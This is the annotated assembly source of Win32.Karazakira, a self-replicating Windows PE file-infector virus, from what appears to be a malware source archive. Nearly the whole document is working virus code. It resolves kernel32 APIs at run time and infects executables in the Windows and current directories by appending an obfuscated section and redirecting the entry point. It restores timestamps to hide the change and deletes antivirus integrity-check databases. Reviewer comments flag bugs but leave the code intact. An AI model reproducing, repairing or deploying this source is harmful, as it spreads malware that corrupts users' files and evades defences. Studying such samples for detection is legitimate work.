MalwareSourceCode/Win32/Infector/Win32.Karazakira.asm

; _ __ ____ __ ___ __ _ _ ____ __
; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \
; | _/ | || | | / | || | |// / | || | | _/ | | | / | || |
; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | |
; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_|
; By Psychologic/rRlf
;
; Kara-Intro :
;
; This is my 3rd win32asm virus. I named it after an Indian ring, "KARAZAKIRA",
; which is believed to be able to call back the soul of a dead man.
; Well, I think this is a unique name.
; Workz :
;
; When an infected file is executed, Karazakira infects up to 4 PE *.EXE files in the Windows
; directory and then up to 4 more in the current directory (the count is reset per directory).
; Each victim gets a new, appended last section named ".Karazakira"; the already-infected test
; compares the first dword of the last section's name with ".Kar" (written in the infect section
; as the TASM multi-character constant "raK.", i.e. cmp dword ptr [edi], "raK.").
; File modification is done by direct file access (ReadFile / SetFilePointer / WriteFile),
; not by memory mapping (bad idea, right..??) -- well, it is just for a different touch, hehe :P
; Feature :
;
; * full Win32 compatible (all APIs are kernel32 exports resolved at run time; DLLs are skipped)
; * body obfuscated with a 64-bit DIV/MUL transform keyed from GetTickCount (the key is stored
;   in the decryptor stub, so this is an obfuscation layer, not cryptographic encryption)
; * infects the Windows directory first, then the current directory
; * deletes AV integrity-checker databases (ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS, AVP.CRC)
; Compile :
;
; The source is TASM (MASM-compatible) syntax, not NASM. Build it only inside an isolated
; analysis VM: the result is a self-replicating PE infector that also deletes files.
; tasm32 /mx /m karazakira.asm
; tlink32 /Tpe /aa karazakira.obj,,, import32.lib
; ====================================================================================
; ====================================================================================
;
; ====================================================================================
; ====================================================================================
; ---- Layout constants (all relative to the `start` label) ----
length_virus_file EQU (end_static - start)          ; bytes of the body written into a host file (code + initialised data)
length_virus_mem EQU (end_mem - start)              ; bytes the body occupies once mapped (adds the uninitialised work area after end_static)
length_encrypted EQU (end_encrypted - encrypted)    ; region passed through the DIV/MUL transform, in 8-byte units; the final (length mod 8) bytes stay in clear
length_PE_header EQU 1000                           ; DECIMAL 1000 (not 1000h): bytes read from / written back at e_lfanew; must hold the optional header plus all section headers
                                                    ; (TASM symbols are case-insensitive by default, so the lower-case length_pe_header used below is this constant)
; Only the generation-0 host stub imports anything; the viral body resolves kernel32 exports at run time (see call_API).
Extrn MessageBoxA:Proc
Extrn ExitProcess:Proc
.386p
.model flat
; The viral body is assembled into .data because it patches itself in place (delta_offset, crypt_key, orig_eip, host_entry).
; NOTE(review): in the generation-0 binary this means code runs from a data section, which only works where DEP/NX is not enforced.
.data
; Viral entry point inside an infected host (the host's AddressOfEntryPoint is redirected here by infect_dir).
; Register roles: ebp = load delta (runtime address minus assembly-time offset, so [ebp+offset X] reaches X),
;                 esi/edi = in-place cursor over the transformed region, ecx = 8-byte unit count, ebx = key.
start:
pushad                                 ; preserve every host register; popfd/popad in return_to_host undo this
pushfd
db 0BDh                                ; opcode of `mov ebp, imm32`; the imm32 is the dword right below ...
delta_offset dd 0                      ; ... patched by infect_dir with (new section VA + ImageBase - offset start); 0 in generation 0
lea esi, [ebp+offset encrypted]
mov edi, esi                           ; decrypt in place
mov ecx, length_encrypted / 8          ; integer division: the trailing 0-7 bytes of the region are never transformed
db 0BBh                                ; opcode of `mov ebx, imm32` ...
crypt_key dd 0                         ; ... imm32 = per-infection key written by infect_dir (derived from GetTickCount)
; ---- Initialised data carried in the body (part of the transformed region? no: this precedes `encrypted`, so it stays in clear) ----
rush_code:
copyright db "Win32.Karazakira By Psychologic", 0
db "On Friday, second January '05 - Depok City, Indonesia", 0
; ASCIIZ names of the kernel32 exports resolved via GetProcAddress (call_API takes a pointer to one of these in eax).
GetProcAddress db "GetProcAddress", 0
l_GPA = $ - offset GetProcAddress      ; 15 = strlen("GetProcAddress") + 1, so the export-table compare includes the terminator
FindFirstFileA db "FindFirstFileA", 0
FindNextFileA db "FindNextFileA", 0
FindClose db "FindClose", 0
CreateFileA db "CreateFileA", 0
CloseHandle db "CloseHandle", 0
ReadFile db "ReadFile", 0
WriteFile db "WriteFile", 0
DeleteFileA db "DeleteFileA", 0
SetFilePointer db "SetFilePointer", 0
SetFileAttributesA db "SetFileAttributesA", 0
SetFileTime db "SetFileTime", 0
SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
GetSystemDirectoryA db "GetSystemDirectoryA", 0 ; not referenced by any visible code (dead data)
GetTickCount db "GetTickCount", 0
; Integrity-checker databases of DOS/Win9x-era AV products; infect_dir deletes them from every visited directory so a
; modified .EXE is not flagged by a checksum comparison. Product attribution is not in the code (presumably TBAV,
; MSAV, CPAV and AVP respectively -- verify).
anti_vir_dat db "ANTI-VIR.DAT", 0
chklist_ms db "CHKLIST.MS", 0
chklist_cps db "CHKLIST.CPS", 0
avp_crc db "AVP.CRC", 0
orig_eip dd offset quit_1st_gen        ; VA to continue at after infection: host EntryPoint+ImageBase once infected (set in infect_dir), the dropper's MessageBox stub in generation 0
filemask db "*.EXE", 0
; Template for the appended IMAGE_SECTION_HEADER. infect_dir copies exactly 40 bytes from here (mov ecx, 40 / rep movsb).
; NOTE(review): as written the name is 11 characters plus two zero bytes (13 bytes) while IMAGE_SECTION_HEADER.Name is
; 8 bytes, so every field after the name lands 5 bytes too far in the copied header: the loader would see
; Name=".Karazak", VirtualSize="ira\0", a shifted VirtualAddress/SizeOfRawData/PointerToRawData, and
; Characteristics=0 (the E0000020h below is outside the 40 copied bytes). The values infect_dir stores into
; VirtualSize..PhysicalAddress are therefore not where the loader reads them, and infected files appear unloadable.
; The ".Kar" already-infected check still works because the first 4 name bytes are intact. Left as-is (sample).
new_section_header:
db ".Karazakira", 0, 0
VirtualSize dd length_virus_mem        ; intended Misc.VirtualSize: static body plus work area
VirtualAddress dd 0                    ; intended VirtualAddress: end of the last section rounded up to SectionAlignment
PhysicalSize dd length_virus_file      ; intended SizeOfRawData: overwritten with the FileAlignment-rounded body size
PhysicalAddress dd 0                   ; intended PointerToRawData: end of the last section's raw data rounded up to FileAlignment
dd 0, 0, 0                             ; PointerToRelocations, PointerToLinenumbers, NumberOfRelocations+NumberOfLinenumbers
dd 0E0000020h                          ; intended Characteristics: CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
; Pad before the decryptor. NOTE(review): `encrypted` is a forward reference and ($-encrypted) here is just minus the
; fixed length of the decrypt stub, so this appears to insert a constant pad independent of the data above; it does not
; make length_encrypted a multiple of 8 (which is what the transform would actually need). Check the assembler listing
; before relying on it.
if ((($-encrypted) mod 8) NE 0)
db (8-(($-encrypted) mod 8)) dup(0)
endif
; In-place inverse of the `encrypt` loop in infect_dir. Each 8-byte unit (lo, hi) was stored either as
; (remainder, quotient) of the 64-bit value hi:lo divided by the key, or swapped as (hi, lo) when hi > key.
; A remainder is always < key, so the first dword alone decides which case applies.
; In: esi = edi = start of region, ecx = unit count, ebx = key. Clobbers eax, edx, flags. Falls through into `encrypted`.
decrypt:
lodsd                                  ; first dword: remainder (divided unit) or hi (skipped unit)
xchg eax, edx
lodsd                                  ; second dword: quotient or lo
cmp edx, ebx
JA no_mul                              ; first dword > key -> unit was stored swapped, not divided
push ebx
push edx                               ; save remainder
mul ebx                                ; edx:eax = quotient * key
pop ebx
add eax, ebx                           ; + remainder
adc edx, 0
pop ebx                                ; restore key
stosd                                  ; lo
xchg eax, edx
stosd                                  ; hi
LOOP decrypt
JMP encrypted                          ; body is now in clear
no_mul:
stosd                                  ; write lo (was second) then hi (was first): original order restored
xchg eax, edx
stosd
LOOP decrypt
; Plaintext body. Entered from decrypt in an infected host, or directly from start_1st_gen (ebp = 0) in generation 0.
encrypted:
mov eax, [ebp+offset orig_eip]
mov [ebp+offset host_entry], eax       ; make the `push imm32 / ret` in return_to_host jump to the host's original EP (or the dropper stub)
; Install a minimal SEH frame: any fault below (bad pointer during the kernel32 scan, #DE in encrypt, ...) lands in
; seh_handler, which abandons the infection and returns to the host.
push offset seh_handler
push dword ptr fs:[0]
mov fs:[0], esp
; Locate kernel32: after pushad (8 dwords) + pushfd (1) + the 2 SEH dwords, [esp+44] is the return address pushed by the
; process-startup code that called the entry point. That code lives in kernel32 on the Windows versions of the time
; (assumption, OS-version dependent -- verify), so walking down from it finds the module's MZ header.
mov eax, [esp+11*4]
scan_kernel:
cmp word ptr [eax], "ZM"               ; "MZ" in memory (TASM multi-character constants are stored as big-endian numbers)
JNE kernel_not_found
mov ebx, [eax+3Ch]                     ; e_lfanew (unvalidated; a fault here is caught by the SEH frame)
add ebx, eax
cmp dword ptr [ebx], "EP"              ; "PE\0\0"
JE kernel32_found
kernel_not_found:
dec eax                                ; unaligned, one byte at a time; an unmapped page raises an exception -> seh_handler
JMP scan_kernel
kernel32_found:
mov [ebp+offset kernel32], eax
; Walk the export directory by hand to find GetProcAddress; every other API is resolved through it (call_API).
mov ebx, [ebx+120]                     ; DataDirectory[EXPORT].VirtualAddress (offset 78h from the PE signature in a PE32 header)
add ebx, eax                           ; ebx = IMAGE_EXPORT_DIRECTORY
mov edx, [ebx+20h]                     ; AddressOfNames (array of RVAs)
add edx, eax
mov ecx, [ebx+18h]                     ; NumberOfNames
GPA_search:
push ecx
mov esi, [edx]
add esi, eax                           ; esi = current export name
lea edi, [ebp+offset GetProcAddress]
mov ecx, l_GPA
cld
rep cmpsb                              ; compare 15 bytes including the NUL; stops at the first mismatch
pop ecx
JE GPA_found
inc edx                                ; edx += 4 -> next name RVA
inc edx
inc edx
inc edx
LOOP GPA_search
GPA_not_found:
JMP return_to_host                     ; no GetProcAddress export found -> give up silently
GPA_found:
mov edx, [ebx+18h]
sub edx, ecx                           ; index of the matched name = NumberOfNames - remaining count
shl edx, 1                             ; AddressOfNameOrdinals holds WORDs
add edx, [ebx+24h]
add edx, eax
xor ecx, ecx
mov cx, [edx]                          ; unbiased ordinal
shl ecx, 2                             ; AddressOfFunctions holds DWORD RVAs
add ecx, [ebx+1Ch]
add ecx, eax
mov ebx, [ecx]
add ebx, eax
mov [ebp+offset GPA_addr], ebx
; Remember the current directory, then infect the Windows directory first and the original directory second.
; Arguments are pushed right-to-left (stdcall); call_API resolves the name in eax and tail-jumps into the API.
lea eax, [ebp+offset curdir]
push eax
push 260                               ; GetCurrentDirectoryA(260, curdir)
lea eax, [ebp+offset GetCurrentDirectoryA]
call call_API
push 260
lea eax, [ebp+offset windir]
push eax                               ; GetWindowsDirectoryA(windir, 260)
lea eax, [ebp+offset GetWindowsDirectoryA]
call call_API
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
lea eax, [ebp+offset curdir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
; Common exit (normal completion, GetProcAddress not found, or any exception): unhook SEH, restore the host's
; registers and flags, then `push imm32 / ret` into host_entry.
return_to_host:
pop dword ptr fs:[0]                   ; previous handler
pop eax                                ; discard our handler address
popfd
popad
db 068h                                ; opcode of `push imm32`
host_entry dd 0                        ; imm32 = original entry VA (copied from orig_eip above)
ret
; Exception handler (EXCEPTION_RECORD*, EstablisherFrame*, CONTEXT*, DISPATCHER_CONTEXT*). [esp+8] is our establisher
; frame, i.e. the esp value that was stored in fs:[0], so the stack is rewound to the SEH frame and execution resumes
; in return_to_host. No RtlUnwind is performed.
; NOTE(review): an exception inside infect_dir leaks the open file and find handles and leaves the victim's attributes
; and timestamps unrestored, because close / restore_attributes / close_find are bypassed.
seh_handler:
mov esp, [esp+8]
JMP return_to_host
; Infect up to 4 *.EXE files in the current directory after deleting the AV checksum databases from it.
; All state lives at fixed offsets in the work area (find_data, dos_header, pe_header). Clobbers eax-edx, esi, edi, flags.
infect_dir:
mov dword ptr [ebp+infectioncount], 4  ; per-directory budget, decremented only when an infection completes
lea eax, [ebp+offset anti_vir_dat]
call kill_file
lea eax, [ebp+offset chklist_ms]
call kill_file
lea eax, [ebp+offset chklist_cps]
call kill_file
lea eax, [ebp+offset avp_crc]
call kill_file
lea eax, [ebp+offset find_data]
push eax
lea eax, [ebp+offset filemask]
push eax                               ; FindFirstFileA("*.EXE", &find_data)
lea eax, [ebp+offset FindFirstFileA]
call call_API
mov [ebp+offset search_handle], eax
inc eax                                ; INVALID_HANDLE_VALUE (-1) -> 0
JZ end_infect_dir
; ---- per-file loop; FileName / FileAttributes / *Time are the WIN32_FIND_DATAA fields filled in by Find*File ----
infect:
push 80h
lea eax, [ebp+offset FileName]
push eax                               ; SetFileAttributesA(FileName, FILE_ATTRIBUTE_NORMAL): make read-only/hidden files writable
lea eax, [ebp+offset SetFileAttributesA]
call call_API
push 0                                 ; hTemplateFile
push 80h                               ; FILE_ATTRIBUTE_NORMAL
push 3                                 ; OPEN_EXISTING
push 0                                 ; lpSecurityAttributes
push 0                                 ; no sharing
push 0C0000000h                        ; GENERIC_READ | GENERIC_WRITE
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset CreateFileA]
call call_API
mov [ebp+offset file_handle], eax
inc eax
JZ restore_attributes                  ; open failed (in use, ACL, ...) -> put the attributes back and move on
push 0
lea eax, [ebp+offset bytes_read]
push eax
push 64                                ; whole IMAGE_DOS_HEADER
lea eax, [ebp+offset dos_header]
push eax
push [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
; NOTE(review): neither ReadFile's return value nor bytes_read is checked here or for the 1000-byte read below; a
; file shorter than that leaves stale bytes from the previous victim in the buffers, which are later written back.
cmp word ptr [ebp+offset exe_marker], "ZM"
JNE close
push 0
push 0                                 ; FILE_BEGIN
push dword ptr [ebp+offset new_header] ; e_lfanew (unvalidated)
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header                  ; 1000 bytes: signature, file header, optional header, section headers
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp dword ptr [ebp+offset pe_marker], "EP" ; "PE\0\0"
JNE close
test word ptr [ebp+offset flags], 0010000000000000b ; IMAGE_FILE_DLL (2000h) in FileHeader.Characteristics
JNZ close                              ; skip DLLs; no machine or PE32/PE32+ magic check is made
; edi = last IMAGE_SECTION_HEADER = optional_header + SizeOfOptionalHeader + 40 * (NumberOfSections - 1)
lea ebx, [ebp+offset optional_header]
add bx, word ptr [ebp+offset SizeOfOptHeader] ; NOTE(review): 16-bit add on bx; a carry out of the low word of the address is lost
xor eax, eax
mov ax, word ptr [ebp+offset NumberOfSections]
dec eax
mov ecx, 40                            ; sizeof(IMAGE_SECTION_HEADER)
mul ecx
add eax, ebx
mov edi, eax
cmp dword ptr [edi], "raK."            ; last section already named ".Kar..." -> already infected
JE close
; Save the original entry point as a VA (assumes the host loads at its ImageBase; no relocation handling) and
; redirect AddressOfEntryPoint to the start of the appended section.
mov eax, [ebp+offset EntryPoint]
add eax, [ebp+offset ImageBase]
mov [ebp+offset orig_eip], eax
inc word ptr [ebp+offset NumberOfSections]
mov eax, [edi+12]                      ; last section VirtualAddress
add eax, [edi+8]                       ; + VirtualSize
mov ebx, [ebp+offset SectionAlign]
call align_EAX                         ; -> VA of the appended section
mov [ebp+offset VirtualAddress], eax
mov [ebp+offset EntryPoint], eax
add eax, [ebp+offset ImageBase]
sub eax, offset start
mov [ebp+offset delta_offset], eax     ; operand of the `mov ebp, imm32` at start: runtime address of `start` minus its assembly-time offset
mov eax, length_virus_mem
call align_EAX                         ; ebx is still SectionAlign
add dword ptr [ebp+offset SizeOfImage], EAX
mov eax, [edi+20]                      ; last section PointerToRawData
add eax, [edi+16]                      ; + SizeOfRawData
mov ebx, [ebp+offset FileAlign]
call align_EAX                         ; -> file offset at which the body is appended
mov [ebp+offset PhysicalAddress], eax
push 0
push 0
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
mov eax, length_virus_file
call align_EAX                         ; ebx is still FileAlign
mov [ebp+PhysicalSize], eax            ; eax (aligned raw size) is also the WriteFile length, pushed below
; The slot for one more section header must contain 40 zero bytes (free space before the headers end; SizeOfHeaders
; itself is never consulted). pusha/popa preserve the registers around the scan but not the flags, so ZF survives.
mov ecx, 40
lea esi, [ebp+offset new_section_header]
add edi, ecx                           ; edi = slot following the last section header
cld
pusha
xor eax, eax
repe scasb
popa
JNE close                              ; a non-zero byte in the slot -> no room, abort
rep movsb                              ; copy 40 bytes of the template (see the layout note at new_section_header)
push eax                               ; keep the aligned raw size for WriteFile
; Per-infection key: k = t ^ ror(t, 8) with t = GetTickCount(); stored into the decryptor stub's `mov ebx, imm32`.
lea eax, [ebp+offset GetTickCount]
call call_API
mov ebx, eax
ror eax, 8
xor ebx, eax
mov [ebp+offset crypt_key], ebx
; Copy the body to crypt_buffer and transform its `encrypted` region there; the running copy stays in clear.
lea esi, [ebp+offset start]
lea edi, [ebp+offset crypt_buffer]
mov ecx, length_virus_file
rep movsb
lea esi, [ebp+offset crypt_buffer+(encrypted-start)]
mov edi, esi
mov cx, length_encrypted / 8           ; 16-bit move; relies on the rep movsb just above having left ecx = 0 for the upper half
; For each 8-byte unit (lo, hi): if hi <= key store hi:lo / key as (remainder, quotient), else store it swapped as (hi, lo).
; `decrypt` reverses this. NOTE(review): `div` requires hi < key; hi == key (JA where JAE was needed) or a key of 0
; raises #DE, which the SEH frame turns into an aborted infection with the file left unmodified but handles leaked.
encrypt:
lodsd
xchg eax, edx
lodsd
xchg eax, edx                          ; eax = lo, edx = hi
cmp edx, ebx
JA no_div
div ebx                                ; eax = quotient, edx = remainder
no_div:
xchg eax, edx
stosd                                  ; remainder (or hi)
xchg eax, edx
stosd                                  ; quotient (or lo)
loop encrypt
pop eax
push 0
lea ecx, [ebp+offset bytes_read]
push ecx
push eax                               ; aligned raw size: bytes past end_static come from `padding` (and, for FileAlignment > 1024, the work variables after it)
lea eax, [ebp+offset crypt_buffer]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
; Write the modified headers back (new section header, NumberOfSections, AddressOfEntryPoint, SizeOfImage).
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
dec dword ptr [ebp+infectioncount]
; ---- cleanup for an opened file: restore the three timestamps from find_data so the file looks untouched, then close ----
close:
lea eax, [ebp+offset LastWriteTime]
push eax
lea eax, [ebp+offset LastAccessTime]
push eax
lea eax, [ebp+offset CreationTime]
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFileTime]
call call_API
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset CloseHandle]
call call_API
restore_attributes:
push dword ptr [ebp+offset FileAttributes] ; original dwFileAttributes from find_data
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
find_next:
mov ecx, [ebp+infectioncount]
JCXZ close_find                        ; tests cx only; fine while the budget stays <= 4
lea eax, [ebp+offset find_data]
push eax
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindNextFileA]
call call_API
dec eax
JZ infect                              ; TRUE (1) -> another match to process
close_find:
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindClose]
call call_API
end_infect_dir:
ret
; Delete the file named by eax (ASCIIZ, relative to the current directory). Attributes are cleared first so
; read-only / hidden / system copies are removed as well. Return values are ignored. Clobbers eax and whatever the APIs clobber.
kill_file:
push eax                               ; path argument for the DeleteFileA call below
push 80h                               ; FILE_ATTRIBUTE_NORMAL
push eax                               ; SetFileAttributesA(path, FILE_ATTRIBUTE_NORMAL)
lea eax, [ebp+offset SetFileAttributesA]
call call_API
lea eax, [ebp+offset DeleteFileA]      ; DeleteFileA(path)
call call_API
RET
; Resolve and call a kernel32 export. In: eax = address of an ASCIIZ export name; the API's own arguments must
; already have been pushed by the caller (stdcall, right-to-left). GetProcAddress(kernel32, name) is called
; normally, then control tail-jumps into the resolved routine, whose `ret n` returns to call_API's caller and
; removes the arguments. Result in eax; ecx/edx are clobbered by the callee.
; NOTE(review): a failed lookup (eax = 0) is not checked; `JMP eax` then faults and the SEH frame aborts the run.
call_API:
push eax
push dword ptr [ebp+offset kernel32]
call [ebp+offset GPA_addr]
JMP eax
; Round eax up to the next multiple of ebx (ebx must be non-zero). In: eax = value, ebx = alignment.
; Out: eax = rounded value. Clobbers edx and flags; ebx is preserved so callers can reuse it.
align_EAX:
xor edx, edx                           ; edx:eax / ebx
div ebx
or edx, edx                            ; remainder zero -> already aligned
JZ no_round_up
inc eax
no_round_up:
mul ebx                                ; quotient * alignment (edx receives the high half)
RET
end_encrypted:                         ; end of the DIV/MUL-transformed region
end_static:                            ; end of the bytes written into a host (length_virus_file)
; ---- Work area: not stored in the file; covered by the section's VirtualSize so the loader provides it zero-filled. ----
heap:
crypt_buffer db length_virus_file dup(?) ; scratch copy of the body that is transformed and written out
padding db 1024 dup(?)                 ; slack consumed by the FileAlignment-rounded WriteFile of crypt_buffer
windir db 260 dup(?)                   ; MAX_PATH
curdir db 260 dup(?)
kernel32 dd ?                          ; kernel32 image base found by scan_kernel
GPA_addr dd ?                          ; address of GetProcAddress
search_handle dd ?
file_handle dd ?
bytes_read dd ?                        ; lpNumberOfBytesRead/Written for every ReadFile/WriteFile (never inspected)
infectioncount dd ?                    ; remaining per-directory infection budget
; WIN32_FIND_DATAA (318 bytes)
find_data:
FileAttributes dd ?                    ; dwFileAttributes, restored by restore_attributes
CreationTime dq ?                      ; the three FILETIMEs are put back with SetFileTime after writing
LastAccessTime dq ?
LastWriteTime dq ?
FileSize dq ?                          ; nFileSizeHigh, nFileSizeLow
wfd_reserved dq ?                      ; dwReserved0, dwReserved1
FileName db 260 dup(?)                 ; cFileName
DosFileName db 14 dup(?)               ; cAlternateFileName
; IMAGE_DOS_HEADER (64 bytes)
dos_header:
exe_marker dw ?                        ; e_magic, "MZ"
dosheader_shit db 58 dup(?)
new_header dd ?                        ; e_lfanew
; First length_PE_header (1000) bytes of the PE header, read from and written back at e_lfanew. Only the fields
; the infector touches are named; the remaining optional-header fields and the section headers follow and are
; addressed via optional_header + SizeOfOptHeader.
pe_header:
pe_marker dd ?                         ; "PE\0\0"
; IMAGE_FILE_HEADER
machine dw ?
NumberOfSections dw ?                  ; incremented by one per infection
TimeDateStamp dd ?
DebugShit dq ?                         ; PointerToSymbolTable, NumberOfSymbols
SizeOfOptHeader dw ?
flags dw ?                             ; Characteristics (IMAGE_FILE_DLL is tested)
; IMAGE_OPTIONAL_HEADER32
optional_header:
optional_magic dw ?                    ; 10Bh for PE32; not checked
linkerversion dw ?
SizeOfCode dd ?
SizeOfDATA dd ?                        ; SizeOfInitializedData
SizeOfBSS dd ?                         ; SizeOfUninitializedData
EntryPoint dd ?                        ; AddressOfEntryPoint (RVA), redirected to the appended section
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
SectionAlign dd ?
FileAlign dd ?
OSVersion dd ?                         ; Major/MinorOperatingSystemVersion
OurVersion dd ?                        ; Major/MinorImageVersion
SubVersion dd ?                        ; Major/MinorSubsystemVersion
reserved1 dd ?                         ; Win32VersionValue
SizeOfImage dd ?                       ; grown by the SectionAlignment-rounded length_virus_mem
SizeOfHeader dd ?                      ; SizeOfHeaders: never consulted; the only free-slot check is the 40-zero-byte scan
Checksum dd ?                          ; not recomputed after infection
org offset pe_header+length_pe_header  ; reserve the full 1000-byte header buffer
end_mem:                               ; end of the mapped body (length_virus_mem)
; ---- Generation-0 host: a tiny program whose only job is to run the viral body once and then show a message box. ----
.code
start_1st_gen:
pushad                                 ; same register save as `start`, so return_to_host's popfd/popad balance
pushfd
xor ebp, ebp                           ; no load delta: the body sits at its assembly-time offsets
JMP encrypted                          ; the dropper stores the body in clear, so the decryptor is skipped
; Reached through orig_eip -> host_entry -> `push imm32 / ret` in return_to_host.
quit_1st_gen:
push 0                                 ; uType = MB_OK
push offset caption
push offset message
push 0                                 ; hWnd = NULL
call MessageBoxA
push 0
call ExitProcess
caption:
db "Win32.Karazakira by Psychologic"
db 0
message db "Freee palestine...freee palestine", 0
end start_1st_gen                      ; program entry point